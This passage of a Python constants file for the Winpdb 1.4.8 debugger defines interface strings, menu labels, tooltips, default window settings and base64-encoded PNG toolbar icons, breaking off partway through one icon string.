STATIC_ENCODING = """The specified encoding is used as source encoding for the name-space viewer and for the exec and eval console commands. Valid values are either 'auto' or an encoding known by the codecs module. If 'auto' is specified, the source encoding of the active scope will be used, which is utf-8 by default."""
STATIC_ENCODING_SPLIT = """The specified encoding is used as source encoding
for the name-space viewer and for the exec and
eval console commands. Valid values are either
'auto' or an encoding known by the codecs module.
If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8
by default."""
CHECKBOX_SYNCHRONICITY = "Use synchronicity."
STATIC_SYNCHRONICITY = """Traditional Python debuggers that use the inspected thread (usually the main thread) to query or modify the script name-space have to wait until the script hits a break-point. Synchronicity allows the debugger to query and modify the script name-space even if its threads are still running or blocked in C library code by using special worker threads. In some rare cases querying or modifying data in synchronicity can crash the script. For example in some Linux builds of wxPython querying the state of wx objects from a thread other than the GUI thread can crash the script. If this happens or if you want to restrict these operations to the inspected thread, turn synchronicity off."""
STATIC_SYNCHRONICITY_SPLIT = """Traditional Python debuggers that use the
inspected thread (usually the main thread) to
query or modify the script name-space have to
wait until the script hits a break-point.
Synchronicity allows the debugger to query
and modify the script name-space even if its
threads are still running or blocked in C
library code by using special worker threads.
In some rare cases querying or modifying data
in synchronicity can crash the script. For
example in some Linux builds of wxPython
querying the state of wx objects from a thread
other than the GUI thread can crash the script.
If this happens or if you want to restrict
these operations to the inspected thread,
turn synchronicity off."""
STATIC_PWD = """The password is used to secure communication between the debugger console and the debuggee. Debuggees with un-matching passwords will not appear in the attach query list."""
STATIC_PWD_SPLIT = """The password is used to secure communication
between the debugger console and the debuggee.
Debuggees with un-matching passwords will not
appear in the attach query list."""
STATIC_ATTACH_DESC = """Attach to a script (that has the debugger engine running) on local or remote machine:"""
STATIC_ATTACH_DESC_SPLIT = """Attach to a script (that has the debugger engine
running) on local or remote machine:"""
STATIC_LAUNCH_DESC = """Start a new debugging session:"""
STATIC_LAUNCH_ENV = """To set environment variables for the new script use the 'env' console command."""
STATIC_LAUNCH_ENV_SPLIT = """To set environment variables for the new script use the 'env'
console command."""
STATIC_OPEN = """The source file entered will be fetched from the debugee."""
LABEL_EXPR = "New Expression:"
LABEL_ENCODING = "Set encoding:"
LABEL_PWD = "Set password:"
LABEL_OPEN = "File name:"
LABEL_LAUNCH_COMMAND_LINE = "Command line:"
LABEL_ATTACH_HOST = "Host:"
LABEL_CONSOLE = "Command:"
BUTTON_LAUNCH_BROWSE = "Browse"
BUTTON_ATTACH_REFRESH = "Refresh"
CHECKBOX_LAUNCH = "Set working directory to the script folder."
HLIST_HEADER_PID = "PID"
HLIST_HEADER_FILENAME = "Filename"
HLIST_HEADER_TID = "TID"
HLIST_HEADER_NAME = "Name"
HLIST_HEADER_STATE = "State"
HLIST_HEADER_FRAME = "Frame"
HLIST_HEADER_LINENO = "Line"
HLIST_HEADER_FUNCTION = "Function"
HLIST_HEADER_PATH = "Path"
TLC_HEADER_NAME = "Name"
TLC_HEADER_REPR = "Repr"
TLC_HEADER_TYPE = "Type"
VERSION = (1, 4, 8, 0, 'Tychod')
WINPDB_TITLE = "Winpdb 1.4.8 - Tychod"
WINPDB_VERSION = "WINPDB_1_4_8"
WINPDB_SIZE = "winpdb_size"
WINPDB_MAXIMIZE = "winpdb_maximize"
SPLITTER_1_POS = "splitter_1_pos"
SPLITTER_2_POS = "splitter_2_pos"
SPLITTER_3_POS = "splitter_3_pos"
SPLITTER_4_POS = "splitter_4_pos"
WINPDB_SIZE_MIN = (640, 480)
WINPDB_SETTINGS_FILENAME = "winpdb_settings.cfg"
WINPDB_SETTINGS_DEFAULT = {
WINPDB_SIZE: (800, 600),
WINPDB_MAXIMIZE: False,
SPLITTER_1_POS: 190,
SPLITTER_2_POS: 294,
SPLITTER_3_POS: 382,
SPLITTER_4_POS: 305
}
AC_CHAR = "\t"
AC_EXIT = "Alt-X"
AC_ANALYZE = "F3"
AC_BREAK = "F4"
AC_GO = "F5"
AC_NEXT = "F6"
AC_STEP = "F7"
AC_GOTO = "F8"
AC_TOOGLE = "F9"
AC_RETURN = "F12"
ML_EMPTY = "<empty>"
ML_SEPARATOR = "<separator>"
ML_ROOT = "<root>"
ML_FILE = "&File"
ML_PWD = "&Password"
ML_LAUNCH = "&Launch"
ML_ATTACH = "&Attach"
ML_DETACH = "&Detach"
ML_STOP = "&Stop"
ML_RESTART = "&Restart"
ML_OPEN = "&Open Source"
ML_EXIT = "E&xit" + AC_CHAR + AC_EXIT
ML_BREAKPOINTS = "&Breakpoints"
ML_TOGGLE = "&Toggle" + AC_CHAR + AC_TOOGLE
ML_DISABLE = "&Disable All"
ML_ENABLE = "&Enable All"
ML_CLEAR = "&Clear All"
ML_LOAD = "&Load"
ML_SAVE = "&Save"
ML_MORE = "&More..."
ML_CONTROL = "&Control"
ML_ANALYZE = "&Toggle Analyze" + AC_CHAR + AC_ANALYZE
ML_GO = "&Go" + AC_CHAR + AC_GO
ML_BREAK = "&Break" + AC_CHAR + AC_BREAK
ML_STEP = "&Step Into" + AC_CHAR + AC_STEP
ML_NEXT = "&Next" + AC_CHAR + AC_NEXT
ML_RETURN = "&Return" + AC_CHAR + AC_RETURN
ML_GOTO = "Run to &Line" + AC_CHAR + AC_GOTO
ML_JUMP = "&Jump"
ML_WINDOW = "&Window"
ML_HELP = "&Help"
ML_WEBSITE = "&Website"
ML_SUPPORT = "&Support"
ML_DOCS = "&Online Docs"
ML_EXT_DOCS = "&External Docs"
ML_UPDATES = "&Check for Updates"
ML_LICENSE = "&License"
ML_ABOUT = "&About"
TB_GO = "Go"
TB_BREAK = "Break"
TB_STEP = "Step into"
TB_NEXT = "Next"
TB_RETURN = "Return"
TB_GOTO = "Run to line"
TB_FILTER = "Filter out methods and functions from classes and objects in the namespace viewer"
TB_EXCEPTION = "Toggle 'analyze exception' mode"
TB_ENCODING = "Set the source encoding for the name-space viewer and the exec/eval console commands"
TB_SYNCHRONICITY = "Set the synchronicity mode"
TB_TRAP = "Toggle 'trap unhandled exceptions' mode"
TB_FILTER_TEXT = " Filter: %s "
TB_ENCODING_TEXT = " Encoding: %s "
TB_SYNCHRONICITY_TEXT = " Synchronicity: %s "
COMMAND = "command"
TOOLTIP = "tooltip"
TEXT = "text"
DATA = "data"
DATA2 = "data2"
ID = "id"
LABEL = "label"
FORMAT = "format"
KEYS = "keys"
WIDTH = "width"
PWD_TIP = "Set connection password."
LAUNCH_TIP = "Launch a new debugged script."
ATTACH_TIP = "Attach to a debugged script."
DETACH_TIP = "Detach from debugged script."
STOP_TIP = "Shutdown the debugged script."
RESTART_TIP = "Restart the debugged script."
OPEN_TIP = "Open source file in the source viewer."
ANALYZE_TIP = "Toggle analyze exception mode."
BREAK_TIP = "Pause script for inspection."
GO_TIP = "Let script continue its run."
STEP_TIP = "Continue to the next code line, possibly in an inner scope."
NEXT_TIP = "Continue to the next code line in the current scope."
GOTO_TIP = "Continue to the line under the cursor."
RETURN_TIP = "Continue to the end of the current scope."
JUMP_TIP = "Jump to another line in the current scope."
WEBSITE_TIP = "Open the Winpdb homepage."
SUPPORT_TIP = "Open the Winpdb support web page."
DOCS_TIP = "Open the Winpdb online documentation web page."
EXT_DOCS_TIP = "Open the Winpdb external documentation web page."
UPDATES_TIP = "Check for updates in the Winpdb website."
TOGGLE_TIP = "Toggle breakpoint at cursor location."
DISABLE_TIP = "Disable all breakpoints."
ENABLE_TIP = "Enable all breakpoints."
CLEAR_TIP = "Clear all breakpoints."
LOAD_TIP = "Load breakpoints from file."
SAVE_TIP = "Save breakpoints to file."
MORE_TIP = "Learn more about Winpdb..."
TOOLTIP_UNLOCKED = "Communication channel is authenticated but NOT encrypted."
TOOLTIP_LOCKED = "Communication channel is authenticated AND encrypted."
TOOLBAR_BITMAP_SIZE = (23, 21)
BASE64_BREAK = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nUUlEQVQ4y2NgGAXDCjDik1QJnPKJgYGBl4GB4cOd9TmCULH3DAwMAshiuAATAct5obQAkpgAFjGy\nDKcIjBo+avgQMfwTlP6GJPYZTW4UjBQAAICvDiDQ+lb5AAAAAElFTkSuQmCC\n'
BASE64_GO = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nZElEQVQ4y2NgGAWkApXAKR8p0c9EQJ5PJXDKf1oZDvPBf5oZTq4FTCTGwX+aGU6qBUxkpqL/NDOc\nWAvINvzO+hxGmhhOjMFkGU6swSQbTorBJBlOqsFEG06OwcQkt0+jdQPVAQDJqB4mOx09ZwAAAABJ\nRU5ErkJggg==\n'
BASE64_STEP = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\ni0lEQVQ4y92UO0sDURCFv9lNCNlK1KSxCIFIUgta+CittIlgp21Q2Ma/IdqIoPZWFq6FEOy10dIm\nkSURS0OsxDTJjoWbGJZssj4anerOcM65c2fmDvxVk2AgVzzUQOgeOAP2Xcdu/Ujcv8ACZoASsOHj\nHoBl17GffiQeuGgVuABM4BaYdx27E0XcGAVwHfsS2PPdOWAnauZGRNxJ33nlV8Vdx673uQvfFk+M\nZRJWKr9rpQu1EE6837HShZqVyu8mxjKJIDAWDJjx5Cki86qd2SjZqXqLIuadGU9mgfXQaUmm8kUR\n4xzV7bdG5Thk7rv26Dp2FsBKFbYQOVL11lqNqjOwLCJSAlCvfdVXbwnpQ7aXvY/v8kNqLjMAraZb\nDwjJMP8T/8EPa2h6yMTIsJcM4gfFX0eM5Kgf/RourloGSE5OT31lQfXwPn+guKIHH40xlr60/Xx8\nlx+6uKx0wQHy2mkvtpruy8isJ3LjYsaugerbc6U49Ieq522i3IgRK0fK2oiVUW7U8zb5N/YOEKSA\nXhG59Y4AAAAASUVORK5CYII=\n'
BASE64_NEXT = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\nUUlEQVQ4y9WUMUvDQBTHf6m6hI4lOLgIWQIuFRHULoJOujh0c+jkYhY/hqBbFr+CDmdB6OhSKIiD\n4BCRQEEcSj5AskR0eYXjSNqkcelb7t4///vdy93jYFnDKmt0z4JfQ3oH7oHbSPlpLbhsYAPbwAVw\nLus/geNI+V+14MZGp8AjsAK8APuR8n90T2NReKT8J+BG0l3gyvQ0at7ZnTY/+Vd4pPyxlh7MhNuO\n17Id78F2vFTTUtFac/ZaK4TbjrcKDIAjoK152qINxFM69Mp7wA4QJHH4MRVlHsi3nt73Zu+LNs6D\nX8rYzymib3iIlG8V3MNmHtyVSl/NBZrmGiBrVq7DmyWOsZlTqVX0Jzo8KwHPCo7CmnehQ+maLdOk\nacNFu+Vaxk6Or2N4qj250sPPwAawl8ThRPR1YAR8A4dJHGaVK5dFXeBNYNMYidatAl7u+AMmh2gx\n02GtwwAAAABJRU5ErkJggg==\n'
BASE64_RETURN = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\ne0lEQVQ4y92TPUsDQRCGn8klhLsqqLlGMAjRS36AFn78AhsPol1aqzTiT0gnVpJGS7GzSCMEe1MJ\nYqkStBM0aCVJk9xY6Ek8Em8jCOJUO+w7z747swt/OfJ+TUftJX7zABkDYAHbwBqwDKSimla9ImPD\n835tBjgBFuO0gweIAdgGroD5ccAASQPjOx/gPrAHHLTqlftov6NgU/gmoMB6q145NXE8NNKZXNrJ\neruOW7gbdJb3a0dh7riFOyfr7aYzuXQc74tzK2UfI7Kk2l+I6A7DhWqwImJdWCl7Ftj4Dv75zu2s\n5yNSQrXabd8+RHSX4aLbvn1AtYpIyc56vhFcRLYANOidDelpZzAPNWFNbDhu8dFxi2r6qRy3qI5b\nfDRyDrg/+PmuKfz1B/BXM7hqA8CempuOI35qPmpi4Yruvw8psRoHDzVhzUjd1yEV6oCn/d5K97n1\nMtT1ZH5CrOQ5cNN5uvZNe44GQRmlKYnkyOtKItlAaWoQlPm38QY7vXb+uQlzowAAAABJRU5ErkJg\ngg==\n'
BASE64_GOTO = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nwElEQVQ4y+2SsQ4BURBFz65o9gP0Eo1WoaBW0ejVqmn8B53GL2hG4Su0ColMQpQ+gEpWs8Vms8uT\ntyTErd7Mm5x7Mxn4VgXZRmM4jzOtLbAEZqZy9YInBhHQAsbAKJnbAz1TOXnBM0YDYAVUgA3QMZWb\nCzx8NmAqa2CalG1g4po8dJxbpN79UuGmckiV3bKTp1V9J5wyryUu+DqaSt0LXmRgKoF38jwDF/DL\nerCiH1Ph7qJa03kFl/Mu+Pid/5WrO8B7LfQd3oiRAAAAAElFTkSuQmCC\n'
BASE64_LOCKED = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhUlEQVR42u2UQRLAEAxFP+NguRm5WW6WbrRjOkqorurvmHiR5ANsVeQsQSlBb2u3JHtKUBFRAApAcyK1nPU9MJGAiM4qXd6HJYHvBRTg4Zb4LwcaZgZa7rcqcaPASpzZdRfYop5zwoJnMNdz5paLBADNw2NsmhQiv7s58/u/6YmgCxhbdR19GFJ+yzjAWQAAAABJRU5ErkJggg=="
BASE64_UNLOCKED = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAjklEQVR42u1TQQ7DIAyzUR8WXkb4WX7mnSqtFetCxU6rb0jYJLYBHgzAOyR36HTmkmncoYgQSZGUO0RSo7tlVtgsUGuFJEoiALQmjB4os5PvwhlLyi8D3TKBLWtLVrh3HuxJBZbBVUO+2oJFtd3GK38mmAUAuy/e2hXFEPF3k/fOZZ/ooJSp146pjj94xwuYKl+HgD9iOwAAAABJRU5ErkJggg=="
BASE64_EXCEPTION = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC\nD0lEQVQ4y+2UTUsbURSGn9zcNJMQSVPH7CxMBF0EjIugmxaEbJq9UNv5DfoL3Ar+AH+BJf1aCm6E\nuHLXEJrFLCK0QoUS2kAYCpkxTu50kTjGfBHBpWd37znnPR/3vS882RgLTXNms2UJbAshTE3T8kKE\nU0p1W67rVpRSH4FPllXwHgyezZaXpZRfdD29lkwmEUIEPqUUtm3TbP6peZ731rIK9ZnBs9nysqbF\nzhcXXy5IKSdO5nkeV1e//rqu83pcgdC4VUgpK4axlLsFDodhdTWKrgsajS6W1UGpuwKXlz9rnneT\nH17RuLa2dT0dAM/NCfb2npPJRIKAev2G/f0WjuMjpUTXF3KNxu93wIdBIDGMLIQwk8lkcDbNBJlM\nhNNTh52dJicnbVZWImxtJYKY/pu8H8Eavuix4u56YyMKwNmZg1JQLjv4PqyvRwcbQtO0/DCWHO08\nnAqcMkQi0St0cPDiXtz8vJiYNxFcqW4L0AG6XR/H8YnFQuzuNmm3fYToFe10/HF509fS/yAA+D5U\nq9cAFItxlILNzRiHhzqmmbjHe9d1KzN0rkq2bb9JpXpTHh39wzAiFItxisU4AK2W4vi4HeTYto1S\nqjQrz78ZxtLaLR0jkRC53DPS6TC2rahWr3Ecf4DnP2qe543w/LF+6CvLKlw8VFu+6no6N0Vbvve1\n5eKxVbEEfJ6mik821v4D0B75yPNHQ9UAAAAASUVORK5CYII=\n'
BASE64_TRAP = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nB3RJTUUH1wMWBzIMELT6ewAAAixJREFUeNrNlVtIkwEUx39z35zOteU252X6hbNpEeZW5oUyejC7\naEEIERhRPVTMhx6rh3rLqCB8iaSHejGiqF588QJFD3bZg4HQCsNLuE2deNk3v29urtV7N9RvQef1\nnPPjcPif/4F/GFrVBEdOFUm7jmRU+jmVoY7c1EIw7zCajNTvsuuGl3DVa8TalkNFEGUylBZ4B1fK\nPVRdg6mmbAqXTzi6P6Rl50fZ7HlPb1uuJWSOxMyCicon/dGDg3+q16wW3FBEvcHG5XoX04qE/vmA\neXmUyAXVanFS3crG0JmLl9Dt8GAaHWOLaIw/TQZNcj4Oayk1FnBbJT7NrwlewLH2JeabHZZpf2UV\nzlIRo82OYTzBAckQPzT3fWHviDSzTyZel0WDlODz+KrgG6g7KRNs0RCRY7JUkJTILRaxlXuw2woJ\nGc34ZQVhbjah6OKuzkUG3q568gSB4eraxsBU8OuLPamKNxOTS8VlrnjBVjeZgS8MPbxH5sQwvjJl\nZ9dHfP51n4uYxblGJw9edXCj5xYDrW5e70I83ld936lKLdnk7naIC+e9pwjPjlA2NsiiEsx53IPc\nr0otetyub0TPxldi7wJhtgfCzNgi3HmmrPhUOUdzzc1KHY67AoXXBUydwOm19P91LTo2eVMs12vQ\nhCD1Mkm4Ly1erCf/iBZrr0DRbT21rrSZvIC4X4u1W0dJuxrOL66YxTYRojVgfOQyN3el9TUJ5DXo\nMTv53+MHY3Sxa+ko45EAAAAASUVORK5CYII=\n"
BASE64_FORK = "iVBORw0KGgoAAAANSUhEUgAAABcAAAAVBAMAAABfzGiYAAAAD1BMVEWZAACsqJn///8BAQEAAIBm\nb8BsAAAAAXRSTlMAQObYZgAAAAFiS0dEAIgFHUgAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElN\nRQfXBwQRJRb/bmGBAAAAT0lEQVQY02NgIA4wCoIAjKMEBIoMDlg4ysa4ZJSMjY0VWVyQZFhcXFyQ\nZViQ9UA4ysZGCA6KDEiPi4sDC5JpKMpYQGbDXe3igOQXFnweBQD3YA+4tU+1lQAAAABJRU5ErkJg\ngg==\n"
BASE64_ICON_16 = 'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBI\nWXMAAAsTAAALEwEAmpwYAAAAB3RJTUUH1wceCwAVoIFxgQAAAqdJREFUOMuFkltIFFEYx/9zdnN3\nci+E2Wq7uWp4rcBbSQaBRCClUg/lUz0URYTRi1FPgWBIBT1UZpAPERSRmERkN6UI8yExtdhYUTeV\ndbNdXW8zszPn7Mz04CXcNP8vh3O+8/+d7/vOx2FRN560WwRFPRdRWKWsRF2irIQEMdIeGhu49+Fh\n/TjWEAcAdY/eZzFVb5MUli4pDJJMsbzKNBz2D53ofXbzDQAtFmC4/rjdqkT1Tklh6X+NDJJCIckM\nERrlidlauZE3vwuPeQOxACIq6nlJYWlLZlFmEBUKUWaQKIOqagBHrFb3rqsA+H8AksIqRZlCVBhE\nmS6/POn3waBRCMFRmAwqUpOM+5/fyq96ebskYSVAps6VdTPMB0ZwuigJTWdLUXesGG65D/tSgnZX\nAqkuy6OeroacMgBkMQMaXmgWw9xMeCYiK+rO7hdIE8IYbG3FBq8H6b39KLAMQaeMGJnk2J3BNd+5\nmLoXAGcUxEiHHEW+qFBEhPkQH282lY94eb2lBQcIwReOQ6HPh2xhFgFzHIEOGAksh/eYr10Ayo3T\nAd9d3eY8I1PVruoghc5wNCfRCo/HgwCACQAHzQR8igGIclsAHQCwLZGUuBzx2w0/ez/N2VNyvUbe\nVgHo3NG075KtIM7G+oMwUx3gCZJqkmHP5GExw7rcPA6Gr8NaB7e0zyo9XmzZmnG5sbTNne+medBU\nTIeisG0ywmTiVp3CoupfR2Ij/ETLjksOu1aLdTQ+pf92VXkPkZjzSPegfl/VyNR6gKcfhTYAvlgA\nKq78CPYMq6dUjYusZX7bQ7tqGv0NAGYNq11oejU56HRYOjfbDJlWniQTbmFoAmE9+OC10HyyfrQW\nQB8AjftPlhwAS3aqLbMkl88Y8FP6+dv0KAAfgBks/ucfwdhZh0OZfFUAAAAASUVORK5CYII=\n'
BASE64_ICON_32 = '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\nTxVPItzU3gAAAABJRU5ErkJggg==\n'
BASE64_ICON_64 = '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